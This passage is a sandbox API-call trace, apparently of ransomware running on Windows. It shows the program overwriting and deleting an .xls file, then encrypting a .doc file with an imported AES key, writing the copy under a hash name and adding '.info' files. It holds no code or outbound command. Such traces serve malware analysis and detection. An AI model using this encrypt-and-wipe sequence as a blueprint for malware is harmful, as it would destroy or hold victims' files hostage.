lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00.info", lpFilePart=0x0) returned 0x56 [0076.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.320] GetFileType (hFile=0x36c) returned 0x1 [0076.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.320] GetFileType (hFile=0x36c) returned 0x1 [0076.320] WriteFile (in: hFile=0x36c, lpBuffer=0x22de060*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x22de060*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.321] CloseHandle (hObject=0x36c) returned 1 [0076.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.322] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbec990, ftCreationTime.dwHighDateTime=0x1d4d336, ftLastAccessTime.dwLowDateTime=0x6346a020, ftLastAccessTime.dwHighDateTime=0x1d4ccca, ftLastWriteTime.dwLowDateTime=0x6346a020, ftLastWriteTime.dwHighDateTime=0x1d4ccca, nFileSizeHigh=0x0, nFileSizeLow=0x98b)) returned 1 [0076.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.322] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", dwFileAttributes=0x80) returned 1 [0076.322] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), fInfoLevelId=0x0, lpFileInformation=0x22e5c88 | out: lpFileInformation=0x22e5c88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbec990, ftCreationTime.dwHighDateTime=0x1d4d336, ftLastAccessTime.dwLowDateTime=0x6346a020, ftLastAccessTime.dwHighDateTime=0x1d4ccca, ftLastWriteTime.dwLowDateTime=0x6346a020, ftLastWriteTime.dwHighDateTime=0x1d4ccca, nFileSizeHigh=0x0, nFileSizeLow=0x98b)) returned 1 [0076.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.323] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.323] GetFileType (hFile=0x36c) returned 0x1 [0076.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.323] GetFileType (hFile=0x36c) returned 0x1 [0076.323] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.323] WriteFile (in: hFile=0x36c, lpBuffer=0x22e6170*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22e6170*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xa00, lpOverlapped=0x0) returned 1 [0076.324] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.324] WriteFile (in: hFile=0x36c, lpBuffer=0x22e6170*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22e6170*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xa00, lpOverlapped=0x0) returned 1 [0076.324] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.325] WriteFile (in: hFile=0x36c, lpBuffer=0x22e6170*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22e6170*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xa00, lpOverlapped=0x0) returned 1 [0076.325] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.325] WriteFile (in: hFile=0x36c, lpBuffer=0x22e6170*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22e6170*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xa00, lpOverlapped=0x0) returned 1 [0076.325] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.325] SetEndOfFile (hFile=0x36c) returned 1 [0076.326] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.326] CloseHandle (hObject=0x36c) returned 1 [0076.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.327] GetFileType (hFile=0x36c) returned 0x1 [0076.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.327] GetFileType (hFile=0x36c) returned 0x1 [0076.327] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.327] CloseHandle (hObject=0x36c) returned 1 [0076.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.327] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.327] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.329] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.329] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\hdmocwsigjodnxc3ha.xls")) returned 1 [0076.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\hDmOCwSIgJOdNXC3ha.xls", lpFilePart=0x0) returned 0x47 [0076.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", lpFilePart=0x0) returned 0x51 [0076.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.331] GetFileType (hFile=0x36c) returned 0x1 [0076.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.331] GetFileType (hFile=0x36c) returned 0x1 [0076.331] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.331] CloseHandle (hObject=0x36c) returned 1 [0076.331] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", lpFilePart=0x0) returned 0x51 [0076.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.331] GetFileType (hFile=0x36c) returned 0x1 [0076.331] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.331] GetFileType (hFile=0x36c) returned 0x1 [0076.331] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.331] CloseHandle (hObject=0x36c) returned 1 [0076.331] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00", lpFilePart=0x0) returned 0x51 [0076.331] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C8F4B2F2FC35BD887512154166CBF00" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c8f4b2f2fc35bd887512154166cbf00"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.332] GetFileType (hFile=0x36c) returned 0x1 [0076.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.332] GetFileType (hFile=0x36c) returned 0x1 [0076.332] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.332] CloseHandle (hObject=0x36c) returned 1 [0076.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.332] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.333] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b6e10) returned 1 [0076.334] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x22e96f0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.334] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.334] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.334] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22e97e0, pdwDataLen=0x1bf5d230 | out: pbData=0x22e97e0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.334] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x22e9900, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.334] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.334] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.334] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626ec0) returned 1 [0076.334] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.334] CryptSetKeyParam (hKey=0x1a626ec0, dwParam=0x4, pbData=0x22e9a48*=0x1, dwFlags=0x0) returned 1 [0076.334] CryptSetKeyParam (hKey=0x1a626ec0, dwParam=0x1, pbData=0x22e99f8, dwFlags=0x0) returned 1 [0076.334] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.334] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.335] GetFileType (hFile=0x36c) returned 0x1 [0076.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.335] GetFileType (hFile=0x36c) returned 0x1 [0076.335] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", lpFilePart=0x0) returned 0x51 [0076.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.335] GetFileType (hFile=0x3a4) returned 0x1 [0076.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.335] GetFileType (hFile=0x3a4) returned 0x1 [0076.335] ReadFile (in: hFile=0x36c, lpBuffer=0x22e9e28, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22e9e28*, lpNumberOfBytesRead=0x1bf5d128*=0x734, lpOverlapped=0x0) returned 1 [0076.336] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22fde40*, pdwDataLen=0x1bf5d180*=0x730, dwBufLen=0x730 | out: pbData=0x22fde40*, pdwDataLen=0x1bf5d180*=0x730) returned 1 [0076.336] ReadFile (in: hFile=0x36c, lpBuffer=0x22e9e28, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22e9e28*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.336] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22ff5c8*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x22ff5c8*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.336] CryptEncrypt (in: hKey=0x1a626ec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22ff618*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x22ff618*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.336] WriteFile (in: hFile=0x3a4, lpBuffer=0x22fe5b0*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22fe5b0*, lpNumberOfBytesWritten=0x1bf5d048*=0x740, lpOverlapped=0x0) returned 1 [0076.337] CloseHandle (hObject=0x3a4) returned 1 [0076.338] CloseHandle (hObject=0x36c) returned 1 [0076.338] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.338] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.338] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", lpFilePart=0x0) returned 0x51 [0076.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.338] GetFileType (hFile=0x36c) returned 0x1 [0076.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.338] GetFileType (hFile=0x36c) returned 0x1 [0076.338] ReadFile (in: hFile=0x36c, lpBuffer=0x22ffd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ffd58*, lpNumberOfBytesRead=0x1bf5d148*=0x740, lpOverlapped=0x0) returned 1 [0076.339] ReadFile (in: hFile=0x36c, lpBuffer=0x22ffd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22ffd58*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.339] CloseHandle (hObject=0x36c) returned 1 [0076.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1.info", lpFilePart=0x0) returned 0x56 [0076.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.341] GetFileType (hFile=0x36c) returned 0x1 [0076.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.341] GetFileType (hFile=0x36c) returned 0x1 [0076.341] WriteFile (in: hFile=0x36c, lpBuffer=0x230c448*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x230c448*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.342] CloseHandle (hObject=0x36c) returned 1 [0076.343] GetFullPathNameW (in: 